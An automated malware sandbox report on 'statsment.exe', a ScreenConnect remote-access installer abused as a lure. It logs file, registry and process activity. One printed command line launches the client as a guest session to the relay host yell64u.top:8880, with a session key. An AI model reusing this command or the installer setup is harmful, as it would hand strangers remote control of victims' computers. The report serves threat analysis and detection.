                              Source: statsment.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: statsment.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59d158.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID418.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID438.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID756.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59d15a.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59d15a.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\tvo2klqv.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\tvo2klqv.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID438.tmpJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeCode function: 0_2_05426F000_2_05426F00
                              Source: C:\Users\user\Desktop\statsment.exeCode function: 0_2_05429F000_2_05429F00
                              Source: C:\Users\user\Desktop\statsment.exeCode function: 0_2_0542EEB00_2_0542EEB0
                              Source: C:\Users\user\Desktop\statsment.exeCode function: 0_2_05426EF10_2_05426EF1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3E70BA8_2_00007FFD9B3E70BA
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B40F4708_2_00007FFD9B40F470
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3E10D78_2_00007FFD9B3E10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3E10CF8_2_00007FFD9B3E10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F5BC18_2_00007FFD9B6F5BC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F627B8_2_00007FFD9B6F627B
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F00F58_2_00007FFD9B6F00F5
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6F6D9E8_2_00007FFD9B6F6D9E
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B3F10D79_2_00007FFD9B3F10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B3F10CF9_2_00007FFD9B3F10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B7003CD9_2_00007FFD9B7003CD
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70E3B69_2_00007FFD9B70E3B6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70298B9_2_00007FFD9B70298B
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70F1629_2_00007FFD9B70F162
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B706E4D9_2_00007FFD9B706E4D
                              Source: statsment.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statsment.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statsment.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statsment.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statsment.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statsment.exe, 00000000.00000002.1712693773.0000000003D03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1698052855.0000000002970000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1714490223.0000000005130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1714809217.00000000051C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1696612899.0000000000D41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1720865498.0000000007954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statsment.exe
                              Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.000000000077F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statsment.exe
                              Source: statsment.exe, 00000000.00000000.1684869140.000000000077F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenamezlib.dll2 vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenamewixca.dll\ vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statsment.exe
                              Source: statsment.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statsment.exe
                              Source: statsment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.statsment.exe.5130000.1.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.0.statsment.exe.2563d8.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal48.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\statsment.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\statsment.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: statsment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: statsment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\statsment.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: statsment.exeVirustotal: Detection: 27%
                              Source: statsment.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: statsment.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\statsment.exeFile read: C:\Users\user\Desktop\statsment.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\statsment.exe "C:\Users\user\Desktop\statsment.exe"
                              Source: C:\Users\user\Desktop\statsment.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System"
                              Source: C:\Users\user\Desktop\statsment.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\statsment.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
